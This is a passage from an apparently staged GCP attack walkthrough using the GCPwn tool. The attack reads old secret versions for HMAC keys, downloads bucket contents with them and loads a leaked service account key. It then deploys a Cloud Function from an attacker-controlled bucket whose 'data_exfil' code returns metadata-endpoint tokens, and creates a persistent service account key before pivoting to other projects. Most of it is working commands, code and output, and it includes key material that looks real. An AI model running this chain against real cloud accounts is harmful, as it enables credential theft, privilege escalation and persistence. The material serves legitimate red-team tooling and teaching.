404 Secret Version [projects/239052134916/secrets/ServiceAccountHMACKeys-388372/versions/6] not found. 

[TRUNCATED] 

[****] GET Secret Version latest 

[****] GETTING Secret Values For latest 

[****] SECRET VALUE RETRIEVED FOR latest 

[SUMMARY] GCPwn found 1 Secret(s) in staging-project-1-426001 

- ServiceAccountHMACKeys-388372 

  - 1: ${secret_hmac_key} 

  - 2: {secret_hmac_key} 

  - 3:  bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com 

    GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C2 

  - 4: Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday 

  - latest: Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday 

[*]-------------------------------------------------------------------------------------------------------[*] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

[******] Permission Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 [******] 

[TRUNCATED] 

- Secret Actions Allowed Permissions 

  - staging-project-1-426001 

    - secretmanager.versions.access 

      - ServiceAccountHMACKeys-388372 (Version: 1) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 2) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 3) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 4) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: latest) (secret version) 

It looks like versions 1-4 and latest successfully returned secret values (version 4 and latest are technically the same secret version). In the text output we can see that a value resembling an HMAC key was added in version 3 and later replaced in version 4, with the user erroneously thinking that adding later versions overwrote the past ones. Some standard output in GCPwn restricts values to a certain length; to see the full secret value, we can query the relevant table with data tables or check the downloaded file as shown below. Checking the CSV in GatheredData, we see the version 3 secret contained an access key ID and secret for a Cloud Storage HMAC key.

> cat GatheredData/1_cool_pentesting_workspace/SecretManager/secrets_data_file.csv                                                              

secret_project_id,secret_name_version,secret_value_data 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 1),b'${secret_hmac_key}' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 2),b'{secret_hmac_key}' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 3),b' bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com\nGOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV\ntxyzyeg3H/F79ARUP1YxF0CoZAjeUreTytd++icK' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 4),"b""Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday. Adding a secret version to overwrite previous values so no one will see it.""" 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: latest),"b""Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday. Adding a secret version to overwrite previous values so no one will see it.""" 

Step 6: Download Bucket Content with HMAC Keys 

Great! We have the HMAC keys, but now what? How do we use them to make SigV4 requests? Luckily, GCPwn already has this feature built into enum_buckets per the “--access-id” and “--hmac-secret” flags for both listing and downloading buckets/blobs. Running the module with these values will send SigV4 requests to the Cloud Storage XML API to download bucket contents. Because it’s SigV4 and it was a struggle to implement in vanilla Python, the module actually sends AWS headers as part of these requests to GCP endpoints just to align with SigV4 standards. The requests still target GCP buckets, and ideally these will switch to Google headers in a future update. Running our module, you will notice blobs are now listed under the “service-account-details-2323232” bucket successfully. 
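
As a side note, the same interoperability can be exercised outside GCPwn with any S3-style SigV4 client pointed at the Cloud Storage endpoint. A hedged sketch using boto3 (this is not GCPwn’s internal code path, and the region value is an assumption that may need adjusting):

import boto3

# HMAC key pair recovered from the secret in the previous step
ACCESS_ID = "GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV"
SECRET = "txyzyeg3H/F79ARUP1YxF0CoZAjeUreTytd++icK"

s3 = boto3.client(
    "s3",
    endpoint_url="https://storage.googleapis.com",  # Cloud Storage XML API
    aws_access_key_id=ACCESS_ID,
    aws_secret_access_key=SECRET,
    region_name="auto",  # assumption: GCS generally accepts this for interop
)

bucket = "service-account-details-2323232"
for obj in s3.list_objects_v2(Bucket=bucket).get("Contents", []):
    print(obj["Key"])
    s3.download_file(bucket, obj["Key"], obj["Key"].rsplit("/", 1)[-1])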

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets -h 

usage: main.py [-h] [--buckets BUCKETS | --bucket-file BUCKET_FILE] [--blobs BLOBS | --blob-file BLOB_FILE] [--download] [--output OUTPUT] [--file-size FILE_SIZE] [--good-regex GOOD_REGEX] [--time-limit TIME_LIMIT] [--external-curl] [--iam] [--minimal-calls] [--access-id ACCESS_ID] [--hmac-secret HMAC_SECRET] [--list-hmac-secrets] [--validate-buckets] [--txt TXT] [-v] 

Enumerate Buckets Options 

options: 

  -h, --help            show this help message and exit 

  --buckets BUCKETS     Bucket names to proceed with in the format '--buckets bucket1,bucket2,bucket3' 

[TRUNCATED] 

  --download            Attempt to download all blobs enumerated 

  --output OUTPUT       Output folder for downloading files 

[TRUNCATED] 

  --access-id ACCESS_ID Access ID for HMAC key to use in Request 

  --hmac-secret HMAC_SECRET HMAC Secret to use when making API call 

[TRUNCATED] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets --access-id GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV --hmac-secret txyzyeg3H/F79ARUP1YxF0CoZAjeUreTytd++icK --buckets service-account-details-2323232 --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing service-account-details-2323232 

[***] LIST Bucket Blobs 

[***] DOWNLOAD Bucket Blobs 

[SUMMARY] GCPwn found 1 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- service-account-details-2323232 

  - note.txt 

  - staging-project-1-426001-da65b2807066.json 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*]-------------------------------------------------------------------------------------------------------[*]

If we check GatheredData, we will see the bucket files were successfully downloaded using the HMAC key for SigV4 via the XML Storage API. Going into these files, we can see we have a service account key and a corresponding note. 

> tree GatheredData                                                                

GatheredData 

└── 1_cool_pentesting_workspace 

    ├── SecretManager 

    │   └── secrets_data_file.csv 

    └── Storage 

        ├── REST 

        │   └── staging-project-1-426001 

        │       └── old-development-bucket-9282734 

        │           └── my_staging_service_key.json 

        └── XML 

            └── staging-project-1-426001 

                └── service-account-details-2323232 

                    ├── note.txt 

                    └── staging-project-1-426001-da65b2807066.json 

>  cat staging-project-1-426001-da65b2807066.json  

{ 

  "type": "service_account", 

  "project_id": "staging-project-1-426001", 

  "private_key_id": "da65b2[REDACTED]", 

  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvQIBADANBgkq[REDACTED]\n-----END PRIVATE KEY-----\n", 

  "client_email": "deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com", 

  "client_id": "10251[REDACTED]", 

  "auth_uri": "https://accounts.google.com/o/oauth2/auth", 

  "token_uri": "https://oauth2.googleapis.com/token", 

  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", 

  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/deployer-service-account%40staging-project-1-426001.iam.gserviceaccount.com", 

  "universe_domain": "googleapis.com" 

} 

> cat note.txt                                    

Hey mark. We are still working on getting deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com working. I modeled it just like production so it should be able to create cloud functions. I was even testing it on the service account I've used in other projects: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com. I've used it in "production-project-1-426001" and "testbench-426001" successfully but still running into issues. 

To end this part of the process, let’s add our newly discovered service account key to GCPwn. Note we are resuming the tool below, which lists the credentials we have already added in case we want to resume one of those instead of adding new creds. 
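
For completeness, a key file like this can also be used directly with the google-auth library outside of any tooling. A minimal sketch, assuming the download path used in the transcript below:

from google.oauth2 import service_account
from google.auth.transport.requests import Request

creds = service_account.Credentials.from_service_account_file(
    "/home/kali/Downloads/staging-project-1-426001-da65b2807066.json",
    scopes=["https://www.googleapis.com/auth/cloud-platform"],
)
creds.refresh(Request())  # sign a JWT with the private key and swap it for an access token
print(creds.service_account_email, creds.token[:15] + "...")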

> python3 main.py 

[*] Found existing sessions: 

  [0] New session 

  [1] cool_pentesting_workspace 

  [2] exit 

Choose an option: 1 

[TRUNCATED] 

[*] Listing existing credentials... 

  [1] leaked_adc_dev_creds (adc) - fwdcloudsec2233@gmail.com 

  [2] my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 (service) - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit an empty string.  

[1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo])  

[2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json) 

[3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)   

[4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json) 

[TRUNCATED] 

Input: service deployer_service_account /home/kali/Downloads/staging-project-1-426001-da65b2807066.json 

[*] Credentials successfuly added 

Loading in Service Credentials... 

[*] Loaded credentials deployer_service_account 

(staging-project-1-426001:deployer_service_account)> creds info 

Summary for deployer_service_account: 

Email: deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

Final Notes

This concludes Part 2 of the sample exploit scenario. Part 3 picks up where this leaves off and demonstrates a few additional exploit modules. As you use the tool, feel free to file issues/pull requests as you run into bugs, as the tool continues to be refactored and improved.

Part 3

Having covered several modules in Part 2 involving Cloud Storage and Secrets Manager, I will finish the exploit scenario in this part with modules involving Cloud Functions and implicit delegation. Note I presented a similar scenario at fwd:cloudsec 2024 (https://www.youtube.com/watch?v=opvv9h3Qe0s&t=1006s), albeit with fewer modules shown 🙂  

This attack path will cover the following steps: 

  • Quick Overview of Next Steps: Create Cloud Function to Pivot to Attached SA  
  • Step 7: Create a Cloud Function and Query Metadata Endpoint 
  • Quick Overview of Next Steps: Creating Service Account Key 
  • Step 8: Review IAM Bindings & Add a Service Account Key for Current SA 
  • Quick Overview of Next Steps: Implicit Delegation Across Multiple Projects 
  • Step 9: Add New Projects and Enumerate 

Quick Overview of Next Steps: Create Cloud Function to Pivot to Attached SA  

Again, let’s take a quick pause and look at the diagram below, which covers our next steps. Having just become deployer-service-account, we want to leverage our supposed ability to create cloud functions to pivot to the testbench-serviceaccount-multi service account. While not shown below, deployer-service-account has iam.serviceAccounts.actAs permissions over testbench-serviceaccount-multi (not covered here in the interest of brevity). Using GCPwn, we will create a function with the target service account attached and the source code supplied from an attacker-controlled bucket in a completely different ecosystem (the hosted source code ZIP file is provided with GCPwn). We will then invoke the newly created V1 function with the GCPwn payload, which returns the OAuth credentials for testbench-serviceaccount-multi, and use those to swap to a new credential set. This is a case of “standalone OAuth2” credentials: we can only use the token for a limited time before it expires, although we will fix that problem in the next step. 

Step 7: Create a Cloud Function and Query Metadata Endpoint 

Before we run any exploit modules, we will run “enum_all” as the new service account. By running enum_all, we populate our GCPwn tables with data that will make it easier to run the exploit module later. Notably, enumerating all data will pick up all the service accounts in the project, which allows GCPwn to prompt us with those service accounts later. 

(staging-project-1-426001:deployer_service_account)> modules run enum_all --iam 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[TRUNCATED] 

   - [staging-project-1-426001] GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV - ACTIVE                                                                                             

     SA: bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                          

[TRUNCATED] 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 5 Service Account(s) in staging-project-1-426001 

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                              

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                     

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                       

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                          

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                               

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                          

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

Having enumerated all the data, we will review the corresponding note from Part 2 Step 6 and highlight some interesting points: 

  • Supposedly deployer-service-account can create cloud functions.  
  • The author usually attaches service account “testbench-serviceaccount-multi” to the running function indicating we might have iam.serviceAccounts.actAs permissions over the service account (required to attach a service account to a function).  
  • The testbench-serviceaccount-multi service account is also used in multiple projects so a successful pivot to that service account might let us break out of our current project. 

Pulling back service account credentials via the GCP metadata endpoint within a cloud function is a known technique, described here: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/. To execute the attack in GCPwn, we will leverage an exploit module, exploit_functions_invoke, to create a V1 cloud function with the specified service account attached, invoke the function, parse the returned OAuth2 creds, and swap the current credential set to the new service account credentials per the OAuth2 token.  

One prerequisite for creating a cloud function is supplying the function code via a file in a GCP bucket (“--bucket-src”). We as the attacker will have already set up a bucket with open permissions in a completely different ecosystem to point our newly created function at. The hosted payload is the ZIP file that ships with GCPwn, in case you want to host it in a bucket yourself. As shown below, the code returns the default service account token via the GCP metadata endpoint:

Codev1v2.zip Source Code: 

import requests 

def data_exfil(request): 

    res_email = requests.get('http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email', headers={'Metadata-Flavor': 'Google'}) 

    res_token = requests.get('http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'}) 

    output_data = { 

        "email": res_email.text, 

        "token": res_token.text 

    } 

    return output_data 

With everything set up, let’s kick off the exploit. Note the only required flag is “--bucket-src”, and GCPwn will give us options for which service account to attach since we enumerated the service accounts earlier. We also pass in the “--create” and “--v1” flags to create a V1 function. Finally, “--invoke” will call the function, while “--assume-creds” instructs GCPwn to assume the returned OAuth2 token as a new credential set. 

(staging-project-1-426001:deployer_service_account)> modules run exploit_functions_invoke --bucket-src gs://attacker-controlled-bucket-used-to-host-payloads-33434/codev1v2.zip --v1 --create --invoke --assume-creds 

[*]-------------------------------------------------------------------------------------------------------[*]

> Provide the function name to create in the format projects/[project_id]/locations/[location_id]/functions/[function_name]? projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

> Do you want to specify a service role to attach on create/update? Note IF CREATING a function, the sdk will auto-attach the default editor sa of PROJECT_ID@appspot.gserviceaccount.com (v1) or PROJECT_NUMBER-compute@developer.gserviceaccount.com (v2) and can reply "n" to this question. [y/n] y 

> Choose an existing sa from those below to attach to the updated/created cloud function: 

>> [1] deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com, projects/staging-project-1-426001/serviceAccounts/deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com 

[TRUNCATED] 

>> [5] testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com, projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

[TRUNCATED] 

> [7] Exit 

> Choose an option: 5 

[*] Waiting for V1 creation operation to complete, this might take some time... 

[*] Successfully created projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

[*] Response from function is: 

{"email":"testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com","token":"{\"access_token\":\"ya29.c.c0ASRK0GYmRcAoUtL7_c_13NS[RECATED]\",\"expires_in\":1799,\"token_type\":\"Bearer\"}"} 

[*] Project ID of credentials is: staging-project-1-426001 

[*] Credentials successfully added 

Loading in OAuth2 token. Note it might be expired based on how long its existed... 

[*] Loaded credentials testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC 

[*]-------------------------------------------------------------------------------------------------------[*]

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> creds info 

Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC: 

Email: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: ya29.c.c0ASRK0GYmRcAoUtL7_c_13NS[REDACTED] 

[*]-------------------------------------------------------------------------------------------------------[*]

As a peek behind the scenes, here is our newly created function as seen in the UI: 

Note the cloud functions exploit module is versatile. You can upload any arbitrary code you want, or choose to just invoke existing functions without creating/updating anything. This is useful if you want to invoke the function you created earlier rather than making a brand new function with each run. This invoke-only feature is shown below, where we grab the function name via the corresponding data tables command (if you didn't want to copy/paste 🙂 ) and pass it to the exploit module with the "--invoke" flag. 

(staging-project-1-426001:deployer_service_account)> data tables cloudfunctions-functions --columns name 

projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

(staging-project-1-426001:deployer_service_account)> modules run exploit_functions_invoke --invoke --function-name projects/staging-project-1-426001/locations/us-central1/functions/attacker-function --v1 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Response from function is: 

{"email":"testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com","token":"{\"access_token\":\"ya29.c.c0ASRK0GYmRcAoUtL7_c_13N[REDACTED]\",\"expires_in\":1243,\"token_type\":\"Bearer\"}"} 

[*]-------------------------------------------------------------------------------------------------------[*]

One final note: the SDK only exposes an invoke call for Cloud Functions V1, not V2. Thus, it's usually easier to do everything with Cloud Functions V1. However, if you want or need to use V2, the tool does support it; under the hood I just make some manual python requests calls. 
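For reference, manually invoking a V2 (HTTP-triggered) function generally means sending an authenticated request yourself. The snippet below is a rough sketch only, not GCPwn source: the function URL is a placeholder, and it assumes the local credentials (for example, a service account key or a metadata server) are able to mint an identity token.

import requests 
import google.auth.transport.requests 
from google.oauth2 import id_token 

# Placeholder URL for an HTTP-triggered V2 function 
FUNCTION_URL = "https://us-central1-staging-project-1-426001.cloudfunctions.net/attacker-function" 

# V2 functions are backed by Cloud Run and expect an identity token whose audience is the function URL 
auth_request = google.auth.transport.requests.Request() 
token = id_token.fetch_id_token(auth_request, FUNCTION_URL) 

response = requests.post(FUNCTION_URL, headers={"Authorization": f"Bearer {token}"}) 
print(response.status_code, response.text) 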

Quick Overview of Next Steps: Creating a Service Account Key  

Again, let's take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. Having just gotten the OAuth2 token for testbench-serviceaccount-multi, we know the token will expire in a finite amount of time. We could keep invoking the cloud function attacker-function and updating the OAuth2 token, but this service account has the viewer role on the project, meaning we can see all the IAM policies in the project. By enumerating everything and checking the policies, we will see that testbench-serviceaccount-multi has permission to create service account keys on testbench-serviceaccount-multi (yep, on itself). Armed with this knowledge we will make a service account key for testbench-serviceaccount-multi for more stable, longer-lived access. 

Step 8: Review IAM Bindings & Add a Service Account Key for Current SA 

While getting an OAuth2 token for testbench-serviceaccount-multi is great and would let us proceed, we are on a bit of a time crunch as the OAuth2 token will expire. We could just keep invoking our function and running `creds update` to refresh the OAuth2 token, but let's see what permissions we have. The last step in enum_all is enum_policy_bindings, which will try to grab all the policy bindings on all data enumerated thus far. We will run enum_all and see if the module was able to gather any policy bindings for later use.

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run enum_all --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[TRUNCATED] 

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                       

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

To check whether the module was successful, we can run `creds info` and see if any getIamPolicy permissions were added. In this case it looks like they were, as seen in the service account permissions below: 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> creds info 

Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC: 

Email: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: ya29.c.c0ASRK0GYmRcAoUtL7_c_13N[REDACTED] 

[******] Permission Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC [******] 

[TRUNCATED] 

- Service Account Actions Allowed Permissions 

  - staging-project-1-426001 

     [TRUNCATED] 

    - iam.serviceAccounts.getIamPolicy 

      - 239052134916-compute@developer.gserviceaccount.com (service account) 

      - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com (service account) 

      - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com (service account) 

      - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com (service account) 

     [TRUNCATED] 

      - staging-project-1-426001@appspot.gserviceaccount.com (service account) 

      - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com (service account) 

[TRUNCATED] 

Note we could have also just run enum_service_accounts as shown below if we wanted to be more granular: 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run enum_service_accounts --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 6 Service Account(s) in staging-project-1-426001 

   - 239052134916-compute@developer.gserviceaccount.com                                                                                                                                         

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                           

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                  

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                    

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                       

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                            

[*]-------------------------------------------------------------------------------------------------------[*]

At this point, we will run the process_iam_bindings module to get a nice summary of any IAM policy bindings that have been gathered thus far. Unlike creds info, which shows you the granular permissions, process_iam_bindings returns a summary of the predefined/custom roles it has identified per user, which is sometimes easier to read. Running it below shows that the testbench-serviceaccount-multi service account has the "roles/iam.serviceAccountKeyAdmin" role on the testbench-serviceaccount-multi service account (itself). 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run process_iam_bindings 

[*]-------------------------------------------------------------------------------------------------------[*]

 

[******] Summary for serviceAccount:deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountUser 

[******] Summary for serviceAccount:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Secret Manager Summary 

  - "projects/239052134916/secrets/ServiceAccountHMACKeys-388372" (in staging-project-1-426001) 

    - roles/secretmanager.secretAccessor 

[******] Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

[******] Summary for user:fwdcloudsec2233@gmail.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

[*]-------------------------------------------------------------------------------------------------------[*]

Since we have that role on ourselves, we can create our own service account key to maintain persistence over time as opposed to relying on the OAuth2 token. We will run exploit_service_account_keys and get a new credential set with a similar credential name but a different timestamp. 
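Under the hood this boils down to a single keys.create call against the IAM API. A rough sketch using the google-cloud-iam client is shown below for context; this is not GCPwn's exact implementation, and the output filename is arbitrary.

from google.cloud import iam_admin_v1 

SA_EMAIL = "testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" 

# Authenticated as testbench-serviceaccount-multi, which holds serviceAccountKeyAdmin on itself 
client = iam_admin_v1.IAMClient() 
request = iam_admin_v1.CreateServiceAccountKeyRequest( 
    name=f"projects/-/serviceAccounts/{SA_EMAIL}"  # the "-" wildcard lets the API resolve the project 
) 
key = client.create_service_account_key(request=request) 

# private_key_data holds the JSON key material (base64-encoded if you use the raw REST API instead) 
with open("testbench-sa-key.json", "wb") as f: 
    f.write(key.private_key_data) 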

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run exploit_service_account_keys --sa projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

[*]-------------------------------------------------------------------------------------------------------[*]

> Do you want to create a new sa key or disable/enable an existing one? 

>> [1] CREATE 

>> [2] ENABLE 

>> [3] DISABLE 

> [4] Exit 

> Choose an option: 1 

> The key was successfully created. Do you want to try assuming the new credentials [y\n].y 

[*] Credentials successfuly added 

Loading in Service Credentials... 

[*] Loaded credentials testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788 

[*]-------------------------------------------------------------------------------------------------------[*]

Quick Overview of Next Steps: Implicit Delegation Across Multiple Projects 

Again, let's take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. At this point we will look outside of our current project to other projects. The bucket that contained the note referencing testbench-serviceaccount-multi said the service account was used in other projects like "production-project-1-426001" and "testbench-426001". We will manually add those projects to GCPwn, run enumeration modules against all the projects, process the resulting IAM bindings, and run an exploit module that leverages implicit delegation to hop to a service account in production.

Step 9: Add New Projects and Enumerate 

In the past steps we were running enum_all against our current project ID. However, the note that was in the same bucket as the earlier JSON key mentioned two other project IDs: "production-project-1-426001" and "testbench-426001". Per the note, it sounds like testbench-serviceaccount-multi has permissions in those other projects. To test this theory, we will manually add those project IDs to GCPwn so that future modules can run against them when prompted. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

